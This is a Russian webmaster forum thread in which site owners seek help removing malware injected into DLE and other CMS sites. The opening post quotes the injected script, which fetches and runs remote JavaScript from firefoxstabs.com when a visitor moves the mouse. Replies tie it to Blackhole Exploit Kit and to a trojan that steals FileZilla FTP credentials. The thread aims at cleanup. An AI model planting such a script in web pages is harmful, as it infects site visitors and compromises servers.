Помогите избавиться от вируса на DLE

oyp3
На сайте с 28.04.2010
Offline
76
7001

Здравствуйте через ДЛЕ попал вирус и прописался частью в php файлах и частью в html вот его код

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>

Причем он потом прописался так же на рядом стоящих сайтах на хостинге в папке www даже на сайтах на которых я работал через прямое соединение host и к ним не было связи с внешнего мира, помогите кто что знает !

Shellenberg
На сайте с 30.05.2008
Offline
47
#1

Я так понимаю, что речь идет про сайт о "недвижимости в Самаре"?

Если да, то там - Blackhole Exploit Kit 😡

Если нет, то покажите пациента в ЛС, есть некоторый опыт решения подобных траблов.

alxsz
На сайте с 30.07.2007
Offline
84
#2
Shellenberg:
Я так понимаю, что речь идет про сайт о "недвижимости в Самаре"?

Если да, то там - Blackhole Exploit Kit 😡
Если нет, то покажите пациента в ЛС, есть некоторый опыт решения подобных траблов.

по гуглу пробив, там не один такой сайт...🍿

Регистрация компаний в Гонконге, Сингапуре и других оффшорах (http://intercorp.hk/russian)
oyp3
На сайте с 28.04.2010
Offline
76
#3

На хостинге где нет старых ДЛЕ 8.3 все нормально а где стоят то все сайты зараженны, хотя все дыры закрывал, на некоторых движках index.php под ноль срезалло, хотел бы знать как от него закрыть ДЛЕ

suvorov.r
На сайте с 25.11.2010
Offline
15
#4

Присоеденяюсь) Подобный троян сожрал 5 сайтов на движках bitrix, shopcms, wordpress, joomla, самопис и ещё один самопис, сука...

Garin33
На сайте с 31.08.2009
Offline
169
#5

У пострадавших есть инфа каким каким макаром вирус на хост попадает?

Потому что Drupal - это круто.
suvorov.r
На сайте с 25.11.2010
Offline
15
#6

Короче, засел троян на комп и тырит пароли с файла Filezilla, потом ходит по FTP и внедряет в файлы index, main, menu и практически во все js свой скрипт. На сайте это сказывается так: кликаешь на любую ссылку и он идет на google.com

Короче как избавится от него на сервере, всем и так понятно, просто почистить все файлы или восстановить бэкап. А вот где эта фигня сидит на компе? Может кто-то из инфорамционной безопасности может подсказать? Стоит NOD32 с последними базами

vip-59
На сайте с 11.08.2009
Offline
63
#7

Его ломают не так!!! Хоть заменяйся его будут ломать, попробуй убрать файл search.php просто переименуй на время, и увидишь взломы пропадут, через поиск его ломают

Сайты - не глисты, за месяц не выведешь!
suvorov.r
На сайте с 25.11.2010
Offline
15
#8

О чем ты? Здесь идет речь и вирусе прикладном. Который из директории C:\Documents and Settings\Администратор\Application Data\FileZilla вытаскивает доступы FTP и ходит по всем FTP записывая вредоносный код. Файл search.php здесь не причем.

Все 5 сайтов, на разных хостингах.

Может кто знает как этого червяка придавить, может у него есть имя?

oyp3
На сайте с 28.04.2010
Offline
76
#9

Пипец сайт ТИЦ 10 только что получил а его червями поело )

Я вел реч о червяке который попадает именно через ДЛЕ версии 8.3 , и он попадает не через ФТП, так как на третьем хостинге все нормально, там версии 9.2 стоят

Shellenberg
На сайте с 30.05.2008
Offline
47
#10

ТС, на оффициальном сайте DLE анонсирована версия 9.2.

Может вы обновите свой двиг и траблы с секьюрити сами закроются?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий